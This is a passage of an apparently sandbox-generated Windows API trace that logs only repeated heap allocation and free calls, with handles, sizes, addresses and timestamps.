lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.080] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.081] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.082] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.084] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0195.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.088] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.088] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.091] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.101] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.101] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.103] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0195.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0195.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0195.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0195.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0195.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0195.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0195.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0195.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0195.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 